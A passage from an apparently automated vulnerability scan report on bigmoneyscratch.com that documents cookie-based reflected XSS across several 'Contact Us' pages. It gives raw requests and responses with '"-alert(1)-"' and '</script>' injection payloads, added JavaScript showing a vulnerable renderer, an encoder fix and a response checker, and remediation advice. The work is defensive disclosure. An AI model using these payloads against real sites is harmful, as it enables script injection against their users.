Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:03 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:03 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:03 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:03 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46316


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM8c517"-alert(1)-"53575243eb4";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.201. http://www.bigmoneyscratch.com/ContactUsChat.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /ContactUsChat.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fe90"-alert(1)-"a5c469a4e05 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ContactUsChat.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM3fe90"-alert(1)-"a5c469a4e05; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:08:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:03 GMT; path=/
Set-Cookie: BO=FM3fe90"-alert(1)-"a5c469a4e05; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:03 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:03 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:03 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:03 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46892


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM3fe90"-alert(1)-"a5c469a4e05";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...
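
The script context in finding 3.201, reproduced as an added example (this is not code from the report or from the site): renderVulnerable mirrors the page's var strBonusOption = "..." line, renderHardened writes the same value through a JavaScript string-literal encoder, and evaluateFragment runs each fragment with a stub alert to show whether the value stayed a string. The first payload is the scanner's canary behind the cookie's FM prefix; the </script> and U+2028 payloads are constructed for this example and were not tested by the scanner. All function names are this example's own.

```javascript
// Added example, not code from the XSS.CX report or from bigmoneyscratch.com.
// The master page script in these findings writes a cookie value straight
// into a double-quoted JavaScript string. This reproduces that rendering,
// evaluates the result roughly as a browser would, and shows the encoding
// that keeps the value a string.

// Vulnerable rendering, modelled on the page's
//   var strBonusOption = "FM";   (value taken from the BO cookie)
function renderVulnerable(cookieValue) {
  return 'var strBonusOption = "' + cookieValue + '";';
}

// Encode a value as a JavaScript string literal that is safe inside an
// inline <script>. JSON.stringify escapes ", \ and control characters; the
// replacements cover what it leaves alone: "</" (the HTML parser would end
// the script element there) and U+2028/U+2029 (line terminators in
// JavaScript source before ES2019).
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/<\//g, '<\\/')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderHardened(cookieValue) {
  return 'var strBonusOption = ' + jsStringLiteral(cookieValue) + ';';
}

// Run a rendered fragment as a function body with a stub alert() in scope,
// reporting what strBonusOption ended up holding and whether anything
// injected executed. Engines differ on a raw U+2028 inside a literal, so
// the vulnerable renderer may pass that payload on current Node; the
// hardened one passes it everywhere.
function evaluateFragment(fragment) {
  let alertCalls = 0;
  const alert = () => { alertCalls += 1; };
  const result = { value: undefined, alertCalls: 0, error: null };
  try {
    result.value = new Function('alert', fragment + '\nreturn strBonusOption;')(alert);
  } catch (e) {
    result.error = String(e);
  }
  result.alertCalls = alertCalls;
  return result;
}

// The JavaScript engine never sees "</script>": the HTML parser acts on it
// first, so that case is checked on the text of the fragment.
function breaksScriptElement(fragment) {
  return /<\/script/i.test(fragment);
}

// A renderer is sound only if every payload comes back as the same string,
// nothing else ran, and the script element stays intact.
function roundTrips(render, payloads) {
  return payloads.every((p) => {
    const fragment = render(p);
    const r = evaluateFragment(fragment);
    return r.error === null && r.alertCalls === 0 && r.value === p && !breaksScriptElement(fragment);
  });
}

// First payload: the scanner's canary from finding 3.201 behind the cookie's
// legitimate FM prefix. The other two are constructed for this example.
const PAYLOADS = [
  'FM3fe90"-alert(1)-"a5c469a4e05',
  'FM</script><script>alert(1)</script>',
  'FM\u2028alert(1)',
];

for (const p of PAYLOADS) {
  console.log('vulnerable:', evaluateFragment(renderVulnerable(p)));
  console.log('hardened:  ', evaluateFragment(renderHardened(p)));
}
console.log('vulnerable round-trips:', roundTrips(renderVulnerable, PAYLOADS));
console.log('hardened round-trips:  ', roundTrips(renderHardened, PAYLOADS));
```

With the canary, the vulnerable fragment evaluates "FM3fe90" - alert(1) - "a5c469a4e05": the stub alert runs once and strBonusOption ends up NaN. The hardened fragment returns the canary unchanged and nothing else runs. On the server the fix is the same single encoder call at the point the cookie value is written into the script.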

3.202. http://www.bigmoneyscratch.com/ContactUsChat.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /ContactUsChat.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5f48"-alert(1)-"8fd67a2d6af was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user: an attacker first needs a way to set the RegistrationMode cookie in the victim's browser, for example through a separate flaw on any host able to set cookies for bigmoneyscratch.com, the domain the cookie is scoped to. That requirement considerably mitigates the impact. Note, however, that the response below re-issues the cookie with the injected value intact (Set-Cookie: RegistrationMode=PMc5f48"-alert(1)-"8fd67a2d6af; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 ...), so a value planted once is sent back, and the injected script re-executed, on every page that renders this script for the next three years unless the cookie is cleared.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, it should be written as a JavaScript string literal with every character outside a conservative allow-list (alphanumerics, for example) encoded as \xHH or \uHHHH, so that ", \, </ and line terminators cannot end the literal or the script element. HTML entity encoding is the wrong encoder for this context: it alters the value and leaves backslashes and line terminators untouched. On .NET 4.0 and later HttpUtility.JavaScriptStringEncode performs this encoding; the 2.0 runtime reported in X-AspNet-Version has no built-in equivalent, so a dedicated encoder is needed. Independently, the RegistrationMode cookie should be validated against the short codes the application actually expects (PM here) before it is used at all.

Request

GET /ContactUsChat.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PMc5f48"-alert(1)-"8fd67a2d6af; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMc5f48"-alert(1)-"8fd67a2d6af; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:44 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:44 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:44 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:44 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46892


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMc5f48"-alert(1)-"8fd67a2d6af";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...
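
A check a practitioner would run on the captured responses from findings 3.201 and 3.202, added here as an example rather than code from the report or the site: parse the raw response, confirm the canary sits verbatim inside a double-quoted string in a script element, and list which Set-Cookie headers hand the canary back and for how long. The sample response is constructed from the abridged headers and script fragment of finding 3.201; the escaped variant is constructed to show what a fixed response would look like. parseResponse, parseSetCookie, findScriptReflection and analyze are this example's own names.

```javascript
// Added example, not code from the XSS.CX report or from bigmoneyscratch.com.
// Re-checks a captured response for the two facts findings 3.201 and 3.202
// show: the canary landing unescaped inside a double-quoted string in a
// <script> element, and the server re-issuing the tainted cookie.

// Constructed sample: headers abridged from finding 3.201, body cut down to
// the reflected script fragment (the real page is about 46 KB).
const CANARY = '3fe90"-alert(1)-"a5c469a4e05';
const SAMPLE_RESPONSE = [
  'HTTP/1.1 200 OK',
  'Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:03 GMT; path=/',
  'Set-Cookie: BO=FM' + CANARY + '; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:03 GMT; path=/',
  'Content-Type: text/html; charset=utf-8',
  '',
  '<html><head><script type="text/javascript">',
  '            var strRegistrationMode = "PM";',
  '            var strBonusOption = "FM' + CANARY + '";',
  '</script></head><body></body></html>',
].join('\r\n');

// Same response with the value written as an escaped literal (constructed;
// the site did not do this). The Set-Cookie line is left as it was.
const SAFE_RESPONSE = SAMPLE_RESPONSE.replace(
  '"FM' + CANARY + '";',
  '"FM' + CANARY.replace(/"/g, '\\"') + '";'
);

// Split a raw HTTP/1.1 response into [name, value] headers and body.
function parseResponse(raw) {
  const idx = raw.indexOf('\r\n\r\n');
  const head = idx === -1 ? raw : raw.slice(0, idx);
  const body = idx === -1 ? '' : raw.slice(idx + 4);
  const headers = [];
  for (const line of head.split('\r\n').slice(1)) {
    const c = line.indexOf(':');
    if (c > 0) headers.push([line.slice(0, c).trim().toLowerCase(), line.slice(c + 1).trim()]);
  }
  return { headers, body };
}

// Parse one Set-Cookie value into name, value and lower-cased attributes.
function parseSetCookie(value) {
  const [pair, ...attrParts] = value.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const attrs = {};
  for (const a of attrParts) {
    const i = a.indexOf('=');
    if (i === -1) attrs[a.toLowerCase()] = true;
    else attrs[a.slice(0, i).trim().toLowerCase()] = a.slice(i + 1).trim();
  }
  return { name: pair.slice(0, eq), value: pair.slice(eq + 1), attrs };
}

// Count double quotes not preceded by a backslash.
function unescapedQuoteCount(text) {
  let n = 0;
  for (let i = 0; i < text.length; i++) {
    if (text[i] === '\\') { i += 1; continue; }
    if (text[i] === '"') n += 1;
  }
  return n;
}

// Look for the canary verbatim inside each <script> body. A verbatim hit
// means its quote survived unencoded; an odd number of unescaped quotes
// between the start of that line and the hit means it sits inside a
// double-quoted string literal.
function findScriptReflection(body, canary) {
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(body)) !== null) {
    const js = m[1];
    const at = js.indexOf(canary);
    if (at === -1) continue;
    const lineStart = js.lastIndexOf('\n', at) + 1;
    const lineEnd = js.indexOf('\n', at);
    return {
      found: true,
      insideDoubleQuotedString: unescapedQuoteCount(js.slice(lineStart, at)) % 2 === 1,
      line: js.slice(lineStart, lineEnd === -1 ? js.length : lineEnd).trim(),
    };
  }
  return { found: false, insideDoubleQuotedString: false, line: null };
}

function analyze(raw, canary) {
  const res = parseResponse(raw);
  const reflection = findScriptReflection(res.body, canary);
  const reissuedCookies = res.headers
    .filter(([name]) => name === 'set-cookie')
    .map(([, value]) => parseSetCookie(value))
    .filter((c) => c.value.includes(canary))
    .map((c) => ({
      name: c.name,
      domain: c.attrs.domain || null,
      expires: c.attrs.expires || null,
      httpOnly: c.attrs.httponly === true,
    }));
  return {
    reflectedInScript: reflection.found,
    insideDoubleQuotedString: reflection.insideDoubleQuotedString,
    reflectedLine: reflection.line,
    reissuedCookies,
  };
}

console.log(JSON.stringify(analyze(SAMPLE_RESPONSE, CANARY), null, 2));
```

A reflectedInScript value of false only says that this canary did not survive verbatim; a value that was HTML-entity encoded, truncated or rejected also yields false, so the function is a regression check against the report's finding, not proof that the context is safe. The reissuedCookies list is the part the scanner's impact text does not weigh: a cookie handed back with a 2014 expiry keeps the injection alive long after the original request.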

3.203. http://www.bigmoneyscratch.com/ContactUsFax.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /ContactUsFax.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dd51"-alert(1)-"212a00bea45 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user: an attacker first needs a way to set the BO cookie in the victim's browser, for example through a separate flaw on any host able to set cookies for bigmoneyscratch.com, the domain the cookie is scoped to. That requirement considerably mitigates the impact. Note, however, that the response below re-issues the cookie with the injected value intact (Set-Cookie: BO=FM9dd51"-alert(1)-"212a00bea45; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 ...), so a value planted once is sent back, and the injected script re-executed, on every page that renders this script for the next three years unless the cookie is cleared.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, it should be written as a JavaScript string literal with every character outside a conservative allow-list (alphanumerics, for example) encoded as \xHH or \uHHHH, so that ", \, </ and line terminators cannot end the literal or the script element. HTML entity encoding is the wrong encoder for this context: it alters the value and leaves backslashes and line terminators untouched. On .NET 4.0 and later HttpUtility.JavaScriptStringEncode performs this encoding; the 2.0 runtime reported in X-AspNet-Version has no built-in equivalent, so a dedicated encoder is needed. Independently, the BO cookie should be validated against the short codes the application actually expects (FM here) before it is used at all.

Request

GET /ContactUsFax.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM9dd51"-alert(1)-"212a00bea45; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:08:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:10 GMT; path=/
Set-Cookie: BO=FM9dd51"-alert(1)-"212a00bea45; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:10 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:10 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:10 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:10 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46758


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM9dd51"-alert(1)-"212a00bea45";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.204. http://www.bigmoneyscratch.com/ContactUsFax.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /ContactUsFax.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8b11"-alert(1)-"244e82d6466 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user: an attacker first needs a way to set the RegistrationMode cookie in the victim's browser, for example through a separate flaw on any host able to set cookies for bigmoneyscratch.com, the domain the cookie is scoped to. That requirement considerably mitigates the impact. Note, however, that the response below re-issues the cookie with the injected value intact (Set-Cookie: RegistrationMode=PMe8b11"-alert(1)-"244e82d6466; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 ...), so a value planted once is sent back, and the injected script re-executed, on every page that renders this script for the next three years unless the cookie is cleared.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, it should be written as a JavaScript string literal with every character outside a conservative allow-list (alphanumerics, for example) encoded as \xHH or \uHHHH, so that ", \, </ and line terminators cannot end the literal or the script element. HTML entity encoding is the wrong encoder for this context: it alters the value and leaves backslashes and line terminators untouched. On .NET 4.0 and later HttpUtility.JavaScriptStringEncode performs this encoding; the 2.0 runtime reported in X-AspNet-Version has no built-in equivalent, so a dedicated encoder is needed. Independently, the RegistrationMode cookie should be validated against the short codes the application actually expects (PM here) before it is used at all.

Request

GET /ContactUsFax.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PMe8b11"-alert(1)-"244e82d6466; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMe8b11"-alert(1)-"244e82d6466; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:53 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:53 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:53 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:53 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:53 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46758


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMe8b11"-alert(1)-"244e82d6466";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.205. http://www.bigmoneyscratch.com/ContactUsMail.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /ContactUsMail.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a56fe"-alert(1)-"8aba95bd886 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user: an attacker first needs a way to set the BO cookie in the victim's browser, for example through a separate flaw on any host able to set cookies for bigmoneyscratch.com, the domain the cookie is scoped to. That requirement considerably mitigates the impact. Note, however, that the response below re-issues the cookie with the injected value intact (Set-Cookie: BO=FMa56fe"-alert(1)-"8aba95bd886; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 ...), so a value planted once is sent back, and the injected script re-executed, on every page that renders this script for the next three years unless the cookie is cleared.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, it should be written as a JavaScript string literal with every character outside a conservative allow-list (alphanumerics, for example) encoded as \xHH or \uHHHH, so that ", \, </ and line terminators cannot end the literal or the script element. HTML entity encoding is the wrong encoder for this context: it alters the value and leaves backslashes and line terminators untouched. On .NET 4.0 and later HttpUtility.JavaScriptStringEncode performs this encoding; the 2.0 runtime reported in X-AspNet-Version has no built-in equivalent, so a dedicated encoder is needed. Independently, the BO cookie should be validated against the short codes the application actually expects (FM here) before it is used at all.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FMa56fe"-alert(1)-"8aba95bd886; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:44 GMT; path=/
Set-Cookie: BO=FMa56fe"-alert(1)-"8aba95bd886; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:44 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:44 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:44 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54327


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMa56fe"-alert(1)-"8aba95bd886";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.206. http://www.bigmoneyscratch.com/ContactUsMail.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /ContactUsMail.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4ff8"-alert(1)-"b6010eeb282 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user: an attacker first needs a way to set the RegistrationMode cookie in the victim's browser, for example through a separate flaw on any host able to set cookies for bigmoneyscratch.com, the domain the cookie is scoped to. That requirement considerably mitigates the impact. Note, however, that the response below re-issues the cookie with the injected value intact (Set-Cookie: RegistrationMode=PMd4ff8"-alert(1)-"b6010eeb282; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 ...), so a value planted once is sent back, and the injected script re-executed, on every page that renders this script for the next three years unless the cookie is cleared.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, it should be written as a JavaScript string literal with every character outside a conservative allow-list (alphanumerics, for example) encoded as \xHH or \uHHHH, so that ", \, </ and line terminators cannot end the literal or the script element. HTML entity encoding is the wrong encoder for this context: it alters the value and leaves backslashes and line terminators untouched. On .NET 4.0 and later HttpUtility.JavaScriptStringEncode performs this encoding; the 2.0 runtime reported in X-AspNet-Version has no built-in equivalent, so a dedicated encoder is needed. Independently, the RegistrationMode cookie should be validated against the short codes the application actually expects (PM here) before it is used at all.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
